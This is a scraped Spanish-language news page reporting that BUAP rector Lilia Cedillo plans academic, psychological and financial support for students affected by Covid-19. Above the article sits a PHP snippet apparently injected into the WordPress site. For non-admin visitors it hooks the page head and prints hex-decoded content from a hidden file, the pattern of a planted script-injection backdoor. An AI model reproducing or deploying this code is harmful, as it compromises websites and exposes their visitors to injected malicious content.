if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Implementará BUAP plan de rescate a alumnos en situación vulnerable: Cedillo – La Opinión Universitaria La Opinión Universitaria
Menu

Implementará BUAP plan de rescate a alumnos en situación vulnerable: Cedillo

 


Mary González

La rectora de la Benemérita Universidad Autónoma de Puebla (BUAP), Lilia Cedillo Ramírez, anunció que está en puerta un plan de rescate académico para todos los alumnos que están en una situación vulnerable; dijo que se contribuirá a que los universitarios concluyan sus estudios.

En entrevista comentó que todos aquellos que resultaron afectados por la pandemia del Covid-19 tendrán el apoyo de la institución para concluir sus estudios por lo que se trabaja en un plan de apoyo.

Abundó que uno de los principales retos de la BUAP es atender a los jóvenes que perdieron a sus familiares directos, pero también cuidar el próximo regreso de los estudiantes a las aulas.

Indicó que si bien todos los estudiantes cuentan con seguro médico, es necesario también que se realicen los trámites correspondientes, con el objetivo de garantizar esta protección.

Aunado a esto se contará con atención psicológica para los jóvenes, pues muchos de ellos perdieron algún familiar y es necesario que se les apoye de manera emocional.

Aunado a esto dijo que se con donarán los pagos de cualquier cuota, como lo anunció en su toma de protesta para ayudar en lo económico.

Es de mencionar que la rectora aseguró que encontró una institución sólida en todos los sentidos por lo que auguró bueno momentos para la institución.

 

 

Tweets recientes